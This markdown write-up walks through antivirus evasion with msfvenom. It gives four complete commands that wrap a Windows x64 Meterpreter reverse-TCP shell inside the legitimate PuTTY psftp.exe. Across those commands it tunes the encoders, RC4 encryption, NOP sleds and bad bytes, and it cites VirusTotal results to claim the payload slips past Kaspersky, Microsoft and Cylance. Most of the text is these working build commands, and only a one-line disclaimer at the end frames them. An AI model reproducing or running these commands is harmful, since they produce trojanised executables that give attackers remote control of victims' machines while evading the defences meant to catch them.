└── AVEvasiononabudget.md


/AVEvasiononabudget.md:
--------------------------------------------------------------------------------
 1 | # Shellcoding - Modern AV Evasion
 2 | I'm unsure if it's my luck or not but I have noticed recently that my simple techniques of shellcoding with MSFVenom has been getting caught by anti-viruses. 
 3 | 
 4 | **PoC**
 5 | https://www.virustotal.com/#/file-analysis/M2ZkYjljNTQ3NjYyYjM1M2YyMjNjMjhiYjA5ZWZjZTg6MTU1MDcxNzE5OA==
 6 | 
 7 | I wanted to do a quick write up of simple methods that I use for simple evasion. 
 8 | 
 9 | # Keep it Simple Stupid (KISS) Method
10 | 
11 | I always try to keep my shellcoding simple; custom shellcoding is always wonderful but if you know you're environment this will help a ton.
12 | 
13 | **Kali Toolkit**
14 | Msfvenom - FUD exe
15 | 
16 | **Target Enviroment**
17 | Windows 10 x64
18 | *Kaspersky*
19 | *UAC*
20 | Up-to-date databases
21 | 
22 | psftp.exe
23 | https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
24 | 
25 | ## Challenge: Simple Shellcode AV Evasion
26 | Shellcode #1 
27 | 
28 | Payload used: 
29 | msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.2.28 LPORT=8443 --arch x64 --platform windows --encoder x64/xor_dynamic --encrypt-iv --encrypt xor --encrypt-key neoncat --iterations 20 --timeout 14 -x psftp.exe -f exe > neoncat.exe
30 | 
31 | **PoC**
32 | https://www.virustotal.com/#/file/0790a58b9f9871abb470af7adc56b9f73adcc6276af984c538b949434ae3f389/
33 | 
34 | ** Notes
35 | Major improvement, but two things concern me. 
36 | 
37 | **Challenge**
38 | 1. ~~Kaspersky is bypassed~~ 
39 | 2. **Microsoft** detects the payload
40 | 3. Cylance detects payload as well (I feel like they toot their horn too much about their anti-virus and AI detection).
41 | 
42 | ## Attempt #2
43 | 
44 | Shellcode #2
45 | msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.2.28 LPORT=8443 --arch x64 --platform windows --encoder x64/xor --encrypt-iv --encrypt xor --encrypt-key neoncatkey --iterations 24 --timeout 18 -x psftp.exe -f exe > neoncat1.exe
46 | 
47 |  - Changed encoder to **x64/xor**
48 |  - Encryption key changed to neoncatkey
49 |  - iterations upped four more and timeout increased by four
50 | 
51 | **PoC**
52 | https://www.virustotal.com/#/file/4310f8a8207b636fde35946966dd6d55e302e89031e07e7071d17b7b51c863fc/
53 | 
54 | **15/66** caught the EXE.
55 | Now we know our entry point, **x64/xor_dynamic** will be our chosen encoder.
56 | 
57 | ## Attempt #3
58 | 
59 | Payload:
60 | msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.2.28 LPORT=8443 --arch x64 --platform windows --encoder x64/xor_dynamic --encrypt-iv --encrypt rc4 --encrypt-key neoncatkeysignature --iterations 60 --timeout 10 -b '\x00' -n 22 -x psftp.exe -f exe > neoncat1.exe 
61 | 
62 | ~~Kaspersky Bybass~~
63 | ~~Microsoft Bypass~~
64 | Cylance didn't scan the file, oddly.
65 | 
66 | Take away, cleaning up the code can help a bit, so generic removing of 1x null byte and swapping encryption method to rc4 has helped. Upping encoding, and adding a NOP slide seemed to have provided way better results.
67 | 
68 | **This payload would be the winner**
69 | 
70 | **PoC**
71 | https://www.virustotal.com/#/file/cb413a14ce6b504c54df7a0b6b705ddc80001fc346b48ea667b81645d8a7c0c6
72 | 
73 | ## Beating Cylance Challenge with MSFVENOM
74 | This one was a fun one, but took super long to encrypt.  I added a very random nope slide, and added additional random null bytes.
75 | 
76 | payload:
77 | msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.2.28 LPORT=8443 --arch x64 --platform windows --encoder x64/xor_dynamic --encrypt-iv --encrypt rc4 --encrypt-key neoncatkeysignaturekey --iterations 135 --timeout 30 -b '\x00\0a\0b' -n 240 -x psftp.exe -f exe > neoncatwinners.exe
78 | 
79 | 
80 | **PoC**
81 | https://www.virustotal.com/#/file/2a11bc26476ab122b5a97084cd129180a8445793d5d8e0f41c3dd11803aaad48
82 | 
83 | 
84 | ## Take aways
85 | 
86 | Understand that encoding and encryption is your best friend, but you need to make custom shellcode and also tinker with the payload for your evasion to increase.
87 | 
88 | **Do not use this for illegal activity, you've been warned.
89 | If you want to hack, I highly suggest checking out Hack the Box.**
90 | 


--------------------------------------------------------------------------------